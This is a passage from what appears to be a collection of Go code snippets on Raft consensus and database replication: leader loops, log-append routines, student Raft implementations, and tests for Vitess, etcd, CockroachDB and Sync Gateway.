MASTER disappear.\n\ttc.leftMasterFakeDb.GetEntry(28).AfterFunc = func() {\n\t\tt.Logf(\"setting MASTER tablet to REPLICA\")\n\t\ttc.leftMasterQs.UpdateType(topodatapb.TabletType_REPLICA)\n\t\ttc.leftMasterQs.AddDefaultHealthResponse()\n\t}\n\n\t// If the HealthCheck didn't pick up the change yet, the 30th write would\n\t// succeed. To prevent this from happening, replace it with an error.\n\ttc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\ttc.leftMasterFakeDb.AddExpectedQuery(\"INSERT INTO `vt_ks`.`table1` (`id`, `msg`, `keyspace_id`) VALUES (*\", errReadOnly)\n\ttc.leftMasterFakeDb.EnableInfinite()\n\t// vtworker may not retry on leftMaster again if HealthCheck picks up the\n\t// change very fast. In that case, the error was never encountered.\n\t// Delete it or verifyAllExecutedOrFail() will fail because it was not\n\t// processed.\n\tdefer tc.leftMasterFakeDb.DeleteAllEntriesAfterIndex(28)\n\n\t// Wait for a retry due to NoMasterAvailable to happen, expect the 30th write\n\t// on leftReplica and change leftReplica from REPLICA to MASTER.\n\t//\n\t// Reset the stats now. It also happens when the worker starts but that's too\n\t// late because this Go routine looks at it and can run before the worker.\n\tstatsRetryCounters.ResetAll()\n\tgo func() {\n\t\tctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)\n\t\tdefer cancel()\n\n\t\tfor {\n\t\t\tretries := statsRetryCounters.Counts()[retryCategoryNoMasterAvailable]\n\t\t\tif retries >= 1 {\n\t\t\t\tt.Logf(\"retried on no MASTER %v times\", retries)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tselect {\n\t\t\tcase <-ctx.Done():\n\t\t\t\tpanic(fmt.Errorf(\"timed out waiting for vtworker to retry due to NoMasterAvailable: %v\", ctx.Err()))\n\t\t\tcase <-time.After(10 * time.Millisecond):\n\t\t\t\t// Poll constantly.\n\t\t\t}\n\t\t}\n\n\t\t// Make leftReplica the new MASTER.\n\t\ttc.leftReplica.TM.ChangeType(ctx, topodatapb.TabletType_MASTER)\n\t\tt.Logf(\"resetting tablet back to MASTER\")\n\t\ttc.leftReplicaQs.UpdateType(topodatapb.TabletType_MASTER)\n\t\ttc.leftReplicaQs.AddDefaultHealthResponse()\n\t}()\n\n\t// Run the vtworker command.\n\tif err := runCommand(t, tc.wi, tc.wi.wr, tc.defaultWorkerArgs); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func (r *Raft) runLeader() {\n\tstate := leaderState{\n\t\tcommitCh: make(chan *DeferLog, 128),\n\t\treplicationState: make(map[string]*followerReplication),\n\t}\n\tdefer state.Release()\n\n\t// Initialize inflight tracker\n\tstate.inflight = NewInflight(state.commitCh)\n\n\tr.peerLock.Lock()\n\t// Start a replication routine for each peer\n\tfor _, peer := range r.peers {\n\t\tr.startReplication(&state, peer)\n\t}\n\tr.peerLock.Unlock()\n\n\t// seal leadership\n\tgo r.leaderNoop()\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase applyLog := <-r.applyCh:\n\t\t\t// Prepare log\n\t\t\tapplyLog.log.Index = r.getLastLogIndex() + 1\n\t\t\tapplyLog.log.Term = r.getCurrentTerm()\n\t\t\t// Write the log entry locally\n\t\t\tif err := r.logs.StoreLog(&applyLog.log); err != nil {\n\t\t\t\tr.logE.Printf(\"Failed to commit log: %w\", err)\n\t\t\t\tapplyLog.response = err\n\t\t\t\tapplyLog.Response()\n\t\t\t\tr.setState(Follower)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Add this to the inflight logs\n\t\t\tstate.inflight.Start(applyLog, r.quorumSize())\n\t\t\tstate.inflight.Commit(applyLog.log.Index)\n\t\t\t// Update the last log since it's on disk now\n\t\t\tr.setLastLogIndex(applyLog.log.Index)\n\n\t\t\t// Notify the replicators of the new log\n\t\t\tfor _, f := range state.replicationState {\n\t\t\t\tasyncNotifyCh(f.triggerCh)\n\t\t\t}\n\n\t\tcase commitLog := <-state.commitCh:\n\t\t\t// Increment the commit index\n\t\t\tidx := commitLog.log.Index\n\t\t\tr.setCommitIndex(idx)\n\n\t\t\t// Perform leader-specific processing\n\t\t\ttransition = r.leaderProcessLog(&state, &commitLog.log)\n\n\t\t\t// Trigger applying logs locally\n\t\t\tr.commitCh <- commitTuple{idx, commitLog}\n\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Leader state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tDPrintf(\"peer-%d ----------------------Start()-----------------------\", rf.me)\n\tindex := -1\n\tterm := -1\n\tisLeader := true\n\n\t// Your code here (2B).\n\t//term, isLeader = rf.GetState()\n\trf.mu.Lock()\n\tterm = rf.currentTerm\n\tif rf.state != Leader {\n\t\tisLeader = false\n\t}\n\tif isLeader {\n\t\t// Append the command into its own rf.log\n\t\tvar newlog LogEntry\n\t\tnewlog.Term = rf.currentTerm\n\t\tnewlog.Command = command\n\t\trf.log = append(rf.log, newlog)\n\t\trf.persist()\n\t\tindex = len(rf.log) // the 3rd return value.\n\t\trf.repCount[index] = 1\n\t\t// now the log entry is appended into leader's log.\n\t\trf.mu.Unlock()\n\n\t\t// start agreement and return immediately.\n\t\tfor peer_index, _ := range rf.peers {\n\t\t\tif peer_index == rf.me {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// send AppendEntries RPC to each peer. And decide when it is safe to apply a log entry to the state machine.\n\t\t\tgo func(i int) {\n\t\t\t\trf.mu.Lock()\n\t\t\t\tnextIndex_copy := make([]int, len(rf.peers))\n\t\t\t\tcopy(nextIndex_copy, rf.nextIndex)\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tfor {\n\t\t\t\t\t// make a copy of current leader's state.\n\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t// we should not send RPC if rf.currentTerm != term, the log entry will be sent in later AE-RPCs in args.Entries.\n\t\t\t\t\tif rf.state != Leader || rf.currentTerm != term {\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t\t// make a copy of leader's raft state.\n\t\t\t\t\tcommitIndex_copy := rf.commitIndex // during the agreement, commitIndex may increase.\n\t\t\t\t\tlog_copy := make([]LogEntry, len(rf.log)) // during the agreement, log could grow.\n\t\t\t\t\tcopy(log_copy, rf.log)\n\t\t\t\t\trf.mu.Unlock()\n\n\t\t\t\t\tvar args AppendEntriesArgs\n\t\t\t\t\tvar reply AppendEntriesReply\n\t\t\t\t\targs.Term = term\n\t\t\t\t\targs.LeaderId = rf.me\n\t\t\t\t\targs.LeaderCommit = commitIndex_copy\n\t\t\t\t\t// If last log index >= nextIndex for a follower: send AppendEntries RPC with log entries starting at nextIndex\n\t\t\t\t\t// NOTE: nextIndex is just a predication. not a precise value.\n\t\t\t\t\targs.PrevLogIndex = nextIndex_copy[i] - 1\n\t\t\t\t\tif args.PrevLogIndex > 0 {\n\t\t\t\t\t\t// FIXME: when will this case happen??\n\t\t\t\t\t\tif args.PrevLogIndex > len(log_copy) {\n\t\t\t\t\t\t\t// TDPrintf(\"adjust PrevLogIndex.\")\n\t\t\t\t\t\t\t//return\n\t\t\t\t\t\t\targs.PrevLogIndex = len(log_copy)\n\t\t\t\t\t\t}\n\t\t\t\t\t\targs.PrevLogTerm = log_copy[args.PrevLogIndex-1].Term\n\t\t\t\t\t}\n\t\t\t\t\targs.Entries = make([]LogEntry, len(log_copy)-args.PrevLogIndex)\n\t\t\t\t\tcopy(args.Entries, log_copy[args.PrevLogIndex:len(log_copy)])\n\t\t\t\t\tok := rf.sendAppendEntries(i, &args, &reply)\n\t\t\t\t\t// handle RPC reply in the same goroutine.\n\t\t\t\t\tif ok == true {\n\t\t\t\t\t\tif reply.Success == true {\n\t\t\t\t\t\t\t// this case means that the log entry is replicated successfully.\n\t\t\t\t\t\t\tDPrintf(\"peer-%d AppendEntries success!\", rf.me)\n\t\t\t\t\t\t\t// re-establish the assumption.\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\tif rf.state != Leader || rf.currentTerm != term {\n\t\t\t\t\t\t\t\t//Figure-8 and p-8~9: never commits log entries from previous terms by counting replicas!\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t// NOTE: TA's QA: nextIndex[i] should not decrease, so check and set.\n\t\t\t\t\t\t\tif index >= rf.nextIndex[i] {\n\t\t\t\t\t\t\t\trf.nextIndex[i] = index + 1\n\t\t\t\t\t\t\t\t// TA's QA\n\t\t\t\t\t\t\t\trf.matchIndex[i] = args.PrevLogIndex + len(args.Entries) // matchIndex is not used in my implementation.\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t// test whether we can update the leader's commitIndex.\n\t\t\t\t\t\t\trf.repCount[index]++\n\t\t\t\t\t\t\t// update leader's commitIndex! We can determine that Figure-8's case will not occur now,\n\t\t\t\t\t\t\t// because we have test rf.currentTerm == term_copy before, so we will never commit log entries from previous terms.\n\t\t\t\t\t\t\tif rf.commitIndex < index && rf.repCount[index] > len(rf.peers)/2 {\n\t\t\t\t\t\t\t\t// apply the command.\n\t\t\t\t\t\t\t\tDPrintf(\"peer-%d Leader moves its commitIndex from %d to %d.\", rf.me, rf.commitIndex, index)\n\t\t\t\t\t\t\t\t// NOTE: the Leader should commit one by one.\n\t\t\t\t\t\t\t\trf.commitIndex = index\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t\t// now the command at commitIndex is committed.\n\t\t\t\t\t\t\t\tgo func() {\n\t\t\t\t\t\t\t\t\trf.canApplyCh <- true\n\t\t\t\t\t\t\t\t}()\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\treturn // jump out of the loop.\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t// AppendEntries RPC fails because of log inconsistency: Decrement nextIndex and retry\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\t// re-establish the assumption.\n\t\t\t\t\t\t\tif rf.state != Leader || rf.currentTerm != term {\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif reply.Term > rf.currentTerm {\n\t\t\t\t\t\t\t\trf.state = Follower\n\t\t\t\t\t\t\t\trf.currentTerm = reply.Term\n\t\t\t\t\t\t\t\trf.persist()\n\t\t\t\t\t\t\t\trf.resetElectionTimeout()\n\t\t\t\t\t\t\t\tDPrintf(\"peer-%d degenerate from Leader into Follower!!!\", rf.me)\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t\trf.nonleaderCh <- true\n\t\t\t\t\t\t\t\t// don't try to send AppendEntries RPC to others then, rf is not the leader.\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// NOTE: the nextIndex[i] should never < 1\n\t\t\t\t\t\t\t\tconflict_term := reply.ConflictTerm\n\t\t\t\t\t\t\t\tconflict_index := reply.ConflictIndex\n\t\t\t\t\t\t\t\t// refer to TA's guide blog.\n\t\t\t\t\t\t\t\t// first, try to find the first index of conflict_term in leader's log.\n\t\t\t\t\t\t\t\tfound := false\n\t\t\t\t\t\t\t\tnew_next_index := conflict_index // at least 1\n\t\t\t\t\t\t\t\tfor j := 0; j < len(rf.log); j++ {\n\t\t\t\t\t\t\t\t\tif rf.log[j].Term == conflict_term {\n\t\t\t\t\t\t\t\t\t\tfound = true\n\t\t\t\t\t\t\t\t\t} else if rf.log[j].Term > conflict_term {\n\t\t\t\t\t\t\t\t\t\tif found {\n\t\t\t\t\t\t\t\t\t\t\tnew_next_index = j + 1\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\tnextIndex_copy[i] = new_next_index\n\t\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\t\t// now retry to send AppendEntries RPC to peer-i.\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\t// RPC fails. Retry!\n\t\t\t\t\t\t// when network partition\n\t\t\t\t\t\ttime.Sleep(time.Millisecond * time.Duration(100))\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(peer_index)\n\t\t}\n\t} else {\n\t\trf.mu.Unlock()\n\t}\n\n\treturn index, term, isLeader\n}", "func (rf *Raft) StartAppendLog() {\n\tvar count int32 = 1\n\tfor i, _ := range rf.peers {\n\t\tif i == rf.me {\n\t\t\tcontinue\n\t\t}\n\t\tgo func(i int) {\n\t\t\tfor{\n\t\t\t\trf.mu.Lock()\n\t\t\t\t//fmt.Printf(\"follower %d lastlogindex: %v, nextIndex: %v\\n\",i, rf.GetPrevLogIndex(i), rf.nextIndex[i])\n\t\t\t\t//fmt.Print(\"sending log entries from leader %d to peer %d for term %d\\n\", rf.me, i, rf.currentTerm)\n\t\t\t\t//fmt.Print(\"nextIndex:%d\\n\", rf.nextIndex[i])\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\targs := AppendEntriesArgs{\n\t\t\t\t\tTerm: rf.currentTerm,\n\t\t\t\t\tLeaderId: rf.me,\n\t\t\t\t\tPrevLogIndex: rf.GetPrevLogIndex(i),\n\t\t\t\t\tPrevLogTerm: rf.GetPrevLogTerm(i),\n\t\t\t\t\tEntries: append(make([]LogEntry, 0), rf.logEntries[rf.nextIndex[i]:]...),\n\t\t\t\t\tLeaderCommit: rf.commitIndex,\n\t\t\t\t}\n\t\t\t\treply := AppendEntriesReply{}\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tok := rf.sendAppendEntries(i, &args, &reply)\n\n\t\t\t\tif !ok {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\trf.mu.Lock()\n\t\t\t\tif rf.state != Leader {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Term > rf.currentTerm {\n\t\t\t\t\trf.BeFollower(reply.Term)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tsend(rf.appendEntry)\n\t\t\t\t\t}()\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif reply.Success {\n\t\t\t\t\trf.matchIndex[i] = args.PrevLogIndex + len(args.Entries)\n\t\t\t\t\trf.nextIndex[i] = rf.matchIndex[i] + 1\n\t\t\t\t\t//fmt.Print(\"leader: %v, for peer %v, match index: %d, next index: %d, peers: %d\\n\", rf.me, i, rf.matchIndex[i], rf.nextIndex[i], len(rf.peers))\n\t\t\t\t\tatomic.AddInt32(&count, 1)\n\t\t\t\t\tif atomic.LoadInt32(&count) > int32(len(rf.peers)/2) {\n\t\t\t\t\t\t//fmt.Print(\"leader %d reach agreement\\n, args.prevlogindex:%d, len:%d\\n\", rf.me, args.PrevLogIndex, len(args.Entries))\n\t\t\t\t\t\trf.UpdateCommitIndex()\n\t\t\t\t\t}\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\t//fmt.Printf(\"peer %d reset the next index from %d to %d\\n\", i, rf.nextIndex[i], rf.nextIndex[i]-1)\n\t\t\t\t\tif rf.nextIndex[i] > 0 {\n\t\t\t\t\t\trf.nextIndex[i]--\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t} else {\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t\t}\n\t\t}(i)\n\t}\n\n}", "func (sm *State_Machine) LeadTesting(t *testing.T) {\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"rename test\"}\n\n\t//<<<|Id:1000|Status:leader|CurrTerm:6|LoggInd:4|votedFor:0|commitInd:0|>>>\n\n\t/*Sending timeout*/\n\t//-->Expected to send heartbeat msg to all server.\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 3, PreLoggTerm: 2, LeaderCom: 2}}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/* Sending an append request*/\n\t//-->Expeced LoggStore msg and Appendentry request to all servers containg current and previous entry.\n\tentr := []MyLogg{sm.Logg.Logg[sm.LoggInd-1], {6, \"rename test\"}}\n\tentry := Logg{Logg: entr}\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = LoggStore{Index: 4, Data: entr}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 4, PreLoggTerm: 6, LeaderCom: 2, Logg: entry}}\n\tfollTC.expect()\n\n\t/* Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 4, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with higher Term.\n\t//-->Expected to step down to Follower and as follower send Alarm signal.\n\tfollTC.req = VoteReq{Term: 8, CandId: 2000, PreLoggInd: 3, PreLoggTerm: 2}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 6, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n}", "func TestActiveReplicatorReconnectOnStartEventualSuccess(t *testing.T) {\n\n\tbase.RequireNumTestBuckets(t, 2)\n\n\tbase.SetUpTestLogging(t, logger.LevelInfo, logger.KeyReplicate, logger.KeyHTTP, logger.KeyHTTPResp)\n\n\t// Passive\n\ttb2 := base.GetTestBucket(t)\n\trt2 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb2,\n\t})\n\tdefer rt2.Close()\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build remoteDBURL with basic auth creds\n\tremoteDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\n\t// Add basic auth creds to target db URL\n\tremoteDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\tid, err := base.GenerateRandomID()\n\trequire.NoError(t, err)\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: id,\n\t\tDirection: db.ActiveReplicatorTypePushAndPull,\n\t\tRemoteDBURL: remoteDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\t// aggressive reconnect intervals for testing purposes\n\t\tInitialReconnectInterval: time.Millisecond,\n\t\tMaxReconnectInterval: time.Millisecond * 50,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\trequire.NoError(t, err)\n\n\tassert.Equal(t, int64(0), ar.Push.GetStats().NumConnectAttempts.Value())\n\n\t// expected error\n\tmsg401 := \"unexpected status code 401 from target database\"\n\n\terr = ar.Start()\n\tdefer func() { assert.NoError(t, ar.Stop()) }() // prevents panic if waiting for ar state running fails\n\tassert.Error(t, err)\n\tassert.True(t, strings.Contains(err.Error(), msg401))\n\n\t// wait for an arbitrary number of reconnect attempts\n\twaitAndRequireCondition(t, func() bool {\n\t\treturn ar.Push.GetStats().NumConnectAttempts.Value() > 3\n\t}, \"Expecting NumConnectAttempts > 3\")\n\n\tresp := rt2.SendAdminRequest(http.MethodPut, \"/db/_user/alice\", `{\"password\":\"pass\"}`)\n\tassertStatus(t, resp, http.StatusCreated)\n\n\twaitAndRequireCondition(t, func() bool {\n\t\tstate, errMsg := ar.State()\n\t\tif strings.TrimSpace(errMsg) != \"\" && !strings.Contains(errMsg, msg401) {\n\t\t\tlog.Println(\"unexpected replicator error:\", errMsg)\n\t\t}\n\t\treturn state == db.ReplicationStateRunning\n\t}, \"Expecting replication state to be running\")\n}", "func (fmd *FakeMysqlDaemon) StartReplication(hookExtraEnv map[string]string) error {\n\tif fmd.StartReplicationError != nil {\n\t\treturn fmd.StartReplicationError\n\t}\n\treturn fmd.ExecuteSuperQueryList(context.Background(), []string{\n\t\t\"START SLAVE\",\n\t})\n}", "func TestProposeAfterRemoveLeader(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\tdefer mn.Stop()\n\n\tstorage := NewMemoryStorage()\n\tif err := mn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage),\n\t\t[]Peer{{ID: 1}}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := mn.Campaign(ctx, 1); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif err := mn.ProposeConfChange(ctx, 1, raftpb.ConfChange{\n\t\tType: raftpb.ConfChangeRemoveNode,\n\t\tNodeID: 1,\n\t}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif err := storage.Append(g.Entries); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor _, e := range g.CommittedEntries {\n\t\tif e.Type == raftpb.EntryConfChange {\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tif err := cc.Unmarshal(e.Data); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tmn.ApplyConfChange(1, cc)\n\t\t}\n\t}\n\tmn.Advance(gs)\n\n\tif err := mn.Propose(ctx, 1, []byte(\"somedata\")); err != nil {\n\t\tt.Errorf(\"err = %v, want nil\", err)\n\t}\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n\tindex := -1\n\tterm := int32(-1)\n\tisLeader := true\n\n\t_, isLeader = rf.GetState()\n\tif !isLeader {\n\t\treturn index, int(term), false\n\t}\n\n\t// TODO: take concurrent out-of-order commit to account\n\trf.stateLock.Lock()\n\tpreLogIndex := int32(0)\n\tpreLogTerm := int32(0)\n\tif len(rf.log) > 1 {\n\t\tpreLogIndex = int32(len(rf.log) - 1)\n\t\tpreLogTerm = rf.log[preLogIndex].Term\n\t}\n\tterm = rf.currentTerm\n\tnewEntry := LogEntry{\n\t\tCommand: command,\n\t\tTerm: term,\n\t}\n\trf.log = append(rf.log, newEntry)\n\t//rf.persist()\n\trf.matchIndex[rf.me] = int32(len(rf.log) - 1)\n\tDPrintf(\"[me : %v]start command: %v at index: %v\", rf.me, command, int32(len(rf.log) - 1))\n\tentries := []LogEntry{newEntry}\n\tappendReq := AppendEntriesRequest{\n\t\tTerm: rf.currentTerm,\n\t\tLeaderId: rf.me,\n\t\tPrevLogIndex: preLogIndex, // change\n\t\tPrevLogTerm: preLogTerm, // change\n\t\tEntries: entries,\n\t\tLeaderCommit: rf.commitIndex,\n\t}\n\trf.stateLock.Unlock()\n\n\tquorumAck := rf.quorumSendAppendEntries(appendReq)\n\tif !quorumAck {\n\t\treturn int(preLogIndex) + 1, int(term), true\n\t}\n\n\t// Your code here (2B).\n\treturn int(preLogIndex) + 1, int(term), isLeader\n}", "func (c *PostgresConnection) StartReplication(slot, publication string, start LSN) error {\n\t// timeline argument should be -1 otherwise postgres reutrns error - pgx library bug\n\treturn c.replConn.StartReplication(slot, uint64(start), -1, pluginArgs(publication))\n}", "func (s *Server) startEnterpriseLeader() {}", "func TestProposal(t *testing.T) {\n\ttests := []struct {\n\t\t*network\n\t\tsuccess bool\n\t}{\n\t\t{newNetwork(nil, nil, nil), true},\n\t\t{newNetwork(nil, nil, nopStepper), true},\n\t\t{newNetwork(nil, nopStepper, nopStepper), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil), false},\n\t\t{newNetwork(nil, nopStepper, nopStepper, nil, nil), true},\n\t}\n\n\tfor j, tt := range tests {\n\t\tsend := func(m pb.Message) {\n\t\t\tdefer func() {\n\t\t\t\t// only recover is we expect it to panic so\n\t\t\t\t// panics we don't expect go up.\n\t\t\t\tif !tt.success {\n\t\t\t\t\te := recover()\n\t\t\t\t\tif e != nil {\n\t\t\t\t\t\tt.Logf(\"#%d: err: %s\", j, e)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\t\t\ttt.send(m)\n\t\t}\n\n\t\tdefer tt.closeAll()\n\t\tdata := []byte(\"somedata\")\n\n\t\t// promote 0 the leader\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tsend(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: data}}})\n\n\t\twantLog := newLog(NewMemoryStorage(), raftLogger)\n\t\tif tt.success {\n\t\t\twantLog = &raftLog{\n\t\t\t\tstorage: newInitedMemoryStorage(\n\t\t\t\t\t[]pb.Entry{{}, {Data: nil, Term: 1, Index: 1}, {Term: 1, Index: 2, Data: data}},\n\t\t\t\t),\n\t\t\t\tunstable: unstable{offset: 3},\n\t\t\t\tcommitted: 2}\n\t\t}\n\t\tdefer wantLog.storage.(IExtRaftStorage).Close()\n\t\tbase := ltoa(wantLog)\n\t\tfor i, p := range tt.peers {\n\t\t\tif sm, ok := p.(*raft); ok {\n\t\t\t\tl := ltoa(sm.raftLog)\n\t\t\t\tif g := diffu(base, l); g != \"\" {\n\t\t\t\t\tt.Errorf(\"#%d: diff:\\n%s\", i, g)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tt.Logf(\"#%d: empty log\", i)\n\t\t\t}\n\t\t}\n\t\tsm := tt.network.peers[1].(*raft)\n\t\tif g := sm.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", j, g, 1)\n\t\t}\n\t}\n}", "func TestRemoveLeader(t *testing.T) {\n\tdefer leaktest.AfterTest(t)\n\tstopper := stop.NewStopper()\n\tconst clusterSize = 6\n\tconst groupSize = 3\n\tcluster := newTestCluster(nil, clusterSize, stopper, t)\n\tdefer stopper.Stop()\n\n\t// Consume and apply the membership change events.\n\tfor i := 0; i < clusterSize; i++ {\n\t\tgo func(i int) {\n\t\t\tfor {\n\t\t\t\tif e, ok := <-cluster.events[i].MembershipChangeCommitted; ok {\n\t\t\t\t\te.Callback(nil)\n\t\t\t\t} else {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(i)\n\t}\n\n\t// Tick all the clocks in the background to ensure that all the\n\t// necessary elections are triggered.\n\t// TODO(bdarnell): newTestCluster should have an option to use a\n\t// real clock instead of a manual one.\n\tstopper.RunWorker(func() {\n\t\tticker := time.NewTicker(10 * time.Millisecond)\n\t\tdefer ticker.Stop()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase <-stopper.ShouldStop():\n\t\t\t\treturn\n\t\t\tcase <-ticker.C:\n\t\t\t\tfor _, t := range cluster.tickers {\n\t\t\t\t\tt.NonBlockingTick()\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n\n\t// Create a group with three members.\n\tgroupID := roachpb.RangeID(1)\n\tcluster.createGroup(groupID, 0, groupSize)\n\n\t// Move the group one node at a time from the first three nodes to\n\t// the last three. In the process, we necessarily remove the leader\n\t// and trigger at least one new election among the new nodes.\n\tfor i := 0; i < groupSize; i++ {\n\t\tlog.Infof(\"adding node %d\", i+groupSize)\n\t\tch := cluster.nodes[i].ChangeGroupMembership(groupID, makeCommandID(),\n\t\t\traftpb.ConfChangeAddNode,\n\t\t\troachpb.ReplicaDescriptor{\n\t\t\t\tNodeID: cluster.nodes[i+groupSize].nodeID,\n\t\t\t\tStoreID: roachpb.StoreID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t\tReplicaID: roachpb.ReplicaID(cluster.nodes[i+groupSize].nodeID),\n\t\t\t}, nil)\n\t\tif err := <-ch; err != nil 